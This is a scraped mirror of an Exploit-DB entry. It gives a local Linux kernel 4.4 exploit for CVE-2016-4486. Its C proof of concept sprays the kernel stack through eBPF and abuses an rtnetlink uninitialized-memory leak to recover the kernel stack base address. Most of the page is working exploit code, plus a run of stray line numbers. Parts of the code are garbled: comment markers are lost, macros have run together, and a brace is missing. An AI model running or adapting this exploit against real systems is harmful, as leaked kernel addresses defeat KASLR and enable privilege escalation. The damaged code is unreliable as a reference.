Linux Kernel 4.4 – ‘rtnetlink’ Stack Memory Disclosure

Exploit Database
116 阅读

作者： Jinbum Park

日期： 2018-12-19
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/46006/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

470

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

* [ Briefs ]

*- CVE-2016-4486 has discovered and reported by Kangjie Lu.

*- This is local exploit against the CVE-2016-4486.

* [ Tested version ]

*- Distro :Ubuntu 16.04

*- Kernel version :4.4.0-21-generic

*- Arch : x86_64

* [ Prerequisites ]

*- None

* [ Goal ]

*- Leak kernel stack base address of current process by exploiting CVE-2016-4486.

* [ Exploitation ]

*- CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack.

*- This exploit gets 61-bits stack base address among the 64-bits full address.

*remaining 3-bits is not leaked because of limitation of ebpf.

*- Full exploitation are performed as follows.

*1. Spraying kernel stack as kernel stack address via running ebpf program.

* - We can spray stack up to 512-bytes by running ebpf program.

* - After this step, memory to be leaked will be filled with kernel stack address.

*2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address.

* - After this step, stack address :0xffff8800????????;(? is unknown address yet.)

*3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one?

* - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address.

* - Then, How to overcome this challenge?? The one of possible answer is that

* do operation on high-4bytes with carefully selected value which changes low-4bytes.

* For example, Assume that real stack address is 0xffff880412340000;

* and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value);

* The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this!

* The result makes us to know that high 4-bytes are smaller than 0x12360000;

* Then, We can keep going with smaller value.

* - The algorithm is quite similar to quick-search.

*4. Unfortunately, ebpf program limitation stops us to leak full 64-bits.

* - 3-bits (bit[16], bit[15], bit[14]) are not leaked.

* - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker.

*Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()?

* - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked.

* - If I use compat-sendmsg(), The execution path will be different from normal sendmsg().

* This makes me to spray it more far.

* [ Run exploit ]

*- $ gcc poc.c -o poc

*- $ ./poc

*....

*leak stack address range :

*-----from :ffff88007f7e0000

*--------to : ffff88007f7fc000

* (Since we can get 61-bit address, Print the possible address range out.)

* [ Contact ]

*- jinb.park7@gmail.com

*- github.com/jinb-park

#include <asm/types.h>

#include <linux/netlink.h>

#include <linux/rtnetlink.h>

#include <sys/socket.h>

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <unistd.h>

#include <stdint.h>

#include <sys/syscall.h>

#include <asm/unistd_64.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <sys/mman.h>

#include <sys/ioctl.h>

#include <linux/bpf.h>

#include <linux/filter.h>

#define GPLv2 "GPL v2"

#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))

#define INTERFACE_INDEX (0)

#define LEAK_OFFSET (28)

* BPF-based stack sprayer

/* registers */

/* caller-saved: r0..r5 */

#define BPF_REG_ARG1BPF_REG_1

#define BPF_REG_ARG2BPF_REG_2

#define BPF_REG_ARG3BPF_REG_3

#define BPF_REG_ARG4BPF_REG_4

#define BPF_REG_ARG5BPF_REG_5

#define BPF_REG_CTX BPF_REG_6

#define BPF_REG_FPBPF_REG_10

#define BPF_MOV32_REG(DST, SRC) \

((struct bpf_insn) {\

.code= BPF_ALU | BPF_MOV | BPF_X, \

.dst_reg = DST, \

.src_reg = SRC, \

.off = 0, \

.imm = 0 })

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)\

((struct bpf_insn) {\

.code= BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\

.dst_reg = DST, \

.src_reg = SRC, \

.off = OFF, \

.imm = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \

((struct bpf_insn) {\

.code= BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \

.dst_reg = DST, \

.src_reg = 0, \

.off = OFF, \

.imm = IMM })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)\

((struct bpf_insn) {\

.code= BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\

.dst_reg = DST, \

.src_reg = SRC, \

.off = OFF, \

.imm = 0 })

#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF)\

((struct bpf_insn) {\

.code= BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\

.dst_reg = DST, \

.src_reg = SRC, \

.off = OFF, \

.imm = 0 })

#define BPF_MOV64_IMM(DST, IMM) \

((struct bpf_insn) {\

.code= BPF_ALU64 | BPF_MOV | BPF_K, \

.dst_reg = DST, \

.src_reg = 0, \

.off = 0, \

.imm = IMM })

#define BPF_EXIT_INSN() \

((struct bpf_insn) {\

.code= BPF_JMP | BPF_EXIT,\

.dst_reg = 0, \

.src_reg = 0, \

.off = 0, \

.imm = 0 })

#define BPF_MOV64_REG(DST, SRC) \

((struct bpf_insn) {\

.code= BPF_ALU64 | BPF_MOV | BPF_X, \

.dst_reg = DST, \

.src_reg = SRC, \

.off = 0, \

.imm = 0 })

#define BPF_ALU64_IMM(OP, DST, IMM) \

((struct bpf_insn) {\

.code= BPF_ALU64 | BPF_OP(OP) | BPF_K,\

.dst_reg = DST, \

.src_reg = 0, \

.off = 0, \

.imm = IMM })

#define BPF_ALU64_REG(OP, DST, SRC) \

((struct bpf_insn) {\

.code= BPF_ALU64 | BPF_OP(OP) | BPF_X,\

.dst_reg = DST, \

.src_reg = SRC, \

.off = 0, \

.imm = 0 })

int bpf_(int cmd, union bpf_attr *attrs)

{

return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));

}

int prog_load(struct bpf_insn *insns, size_t insns_count)

{

char verifier_log[100000];

union bpf_attr create_prog_attrs = {

.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,

.insn_cnt = insns_count,

.insns = (uint64_t)insns,

.license = (uint64_t)GPLv2,

.log_level = 1,

.log_size = sizeof(verifier_log),

.log_buf = (uint64_t)verifier_log

};

int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);

int errno_ = errno;

errno = errno_;

if (progfd == -1) {

printf("bpf prog load error\n");

exit(-1);

}

return progfd;

}

int create_socket_by_socketpair(int *progfd)

{

int socks[2];

if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) {

printf("socketpair error\n");

exit(-1);

}

if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) {

printf("setsockopt error\n");

exit(-1);

}

return socks[1];

}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)

{

int progfd = prog_load(insns, insns_count);

return create_socket_by_socketpair(&progfd);

}

#define NR_sendmsg_32 370 // for 32-bit

typedef unsigned int compat_uptr_t;

typedef int compat_int_t;

typedef unsigned int compat_size_t;

typedef unsigned int compat_uint_t;

struct compat_msghdr {

compat_uptr_t msg_name; /* void * */

compat_int_tmsg_namelen;

compat_uptr_t msg_iov;/* struct compat_iovec * */

compat_size_t msg_iovlen;

compat_uptr_t msg_control;/* void * */

compat_size_t msg_controllen;

compat_uint_t msg_flags;

};

struct compat_iovec {

compat_uptr_t iov_base;

compat_size_t iov_len;

};

int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags)

{

int r = -1;

asm volatile (

"push %%rax\n"

"push %%rbx\n"

"push %%rcx\n"

"push %%rdx\n"

"push %%rsi\n"

"push %%rdi\n"

"mov %1, %%eax\n"

"mov %2, %%ebx\n"

"mov %3, %%ecx\n"

"mov %4, %%edx\n"

"int $0x80\n"

"mov %%eax, %0\n"

"pop %%rdi\n"

"pop %%rsi\n"

"pop %%rdx\n"

"pop %%rcx\n"

"pop %%rbx\n"

"pop %%rax\n"

: "=r" (r)

: "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags)

: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi"

);

return r;

}

#define COMPAT_SENDMSG

void trigger_proc(int sockfd)

{

#ifdef COMPAT_SENDMSG

struct compat_msghdr *msg = NULL;

struct compat_iovec *iov = NULL;

#else

struct msghdr *msg = NULL;

struct iovec *iov = NULL;

#endif

char *buf = NULL;

int r;

// allocate under-32-bit address for compat syscall

msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

if (msg == MAP_FAILED) {

printf("mmap error : %d, %s\n", errno, strerror(errno));

exit(0);

}

buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

if (buf == MAP_FAILED) {

printf("mmap error : %d, %s\n", errno, strerror(errno));

exit(0);

}

iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

if (buf == MAP_FAILED) {

printf("mmap error : %d, %s\n", errno, strerror(errno));

exit(0);

}

#ifdef COMPAT_SENDMSG

iov->iov_base = (compat_uptr_t)buf;

#else

iov->iov_base = buf;

#endif

iov->iov_len = 128;

msg->msg_name = NULL;

msg->msg_namelen = 0;

#ifdef COMPAT_SENDMSG

msg->msg_iov = (compat_uptr_t)iov;

#else

msg->msg_iov = iov;

#endif

msg->msg_iovlen = 1;

msg->msg_control = NULL;

msg->msg_controllen = 0;

msg->msg_flags = 0;

#ifdef COMPAT_SENDMSG

r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0);

#else

r = sendmsg(sockfd, msg, 0);

#endif

if (r < 0) {

printf("sendmsg error, %d, %s\n", errno, strerror(errno));

exit(-1);

}

int sockfds = -1;

void stack_spraying_by_bpf(unsigned long val)

{

int r;

struct bpf_insn stack_spraying_insns[] = {

BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512),

BPF_MOV64_IMM(BPF_REG_0, 0),

BPF_EXIT_INSN()

};

sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns));

if (sockfds < 0)

return;

trigger_proc(sockfds);

close(sockfds);

//sleep(1);

}

28byte, 32byte including padding

struct rtnl_link_ifmap {

__u64 mem_start;

__u64 mem_end;

__u64 base_addr;

__u16 irq;

__u8dma;

__u8port;

};*/

// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol)

struct {

struct nlmsghdr nh;

struct ifinfomsg ifm;

char attrbuf[512];

} req;

// Ubuntu 4.4.0-21-generic

#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and

#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or

int main(int argc, char **argv)

{

unsigned char buf[65535];

unsigned char map_buf[36] = {0,};

struct nlmsghdr *nl_msg_ptr;

struct ifinfomsg *inf_msg_ptr;

struct rtnl_link_ifmap *map_ptr;

struct rtattr *rta_ptr;

int size, len, attr_len, offset;

int progfd;

unsigned int sub_val = 0;

unsigned int leak_value;

unsigned long leak_full_stack = 0;

unsigned int low_stack = 0;

int i;

for (i=0; i<16; i++) {

int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE);

memset(&req, 0, sizeof(req));

req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));

req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;

req.nh.nlmsg_type = RTM_GETLINK;

req.nh.nlmsg_seq = 1;

req.ifm.ifi_family = AF_UNSPEC;

req.ifm.ifi_index = INTERFACE_INDEX;

req.ifm.ifi_change = 0xffffffff;

if (i == 0)

sub_val = 0;

else

sub_val += (1 << (32 - i));

stack_spraying_by_bpf((unsigned long)sub_val);

if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) {

printf("send error\n");

goto out;

}

while (1) {

if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) {

fprintf(stderr, "ERROR recv(): %s\n", strerror(errno));

goto out;

}

for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) {

len = nl_msg_ptr->nlmsg_len;

if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) {

printf("NLMSG_ERROR\n");

goto out;

}

else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE)

break;

if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) {

printf("Not OK\n");

goto out;

}

attr_len = IFLA_PAYLOAD(nl_msg_ptr);

inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr);

rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr);

for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) {

if (rta_ptr->rta_type == IFLA_MAP) {

if (rta_ptr->rta_len != sizeof(map_buf)) {

printf("wrong size\n");

goto out;

}

memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf));

map_ptr = &map_buf;

leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET);

printf("leak_value : %08x\n", leak_value);

break;

}

size -= NLMSG_ALIGN(len);

nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len));

}

break;

}

if (low_stack == 0)

low_stack = leak_value;

else

if (leak_value != low_stack)

sub_val &= (~(1 << (32 - i))); // clear bit

memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4);

memcpy((unsigned char *)&leak_full_stack, &sub_val, 4);

printf("[try-%d] stack address : %lx\n", i, leak_full_stack);

out:

close(rtnetlink_sk);

}

printf("=======================================================================\n");

printf("leak stack address range : \n");

printf("-----from :%lx\n", leak_full_stack & RANGE_MIN_MASK);

printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK);

printf("======================================================================\n");

return 0;

}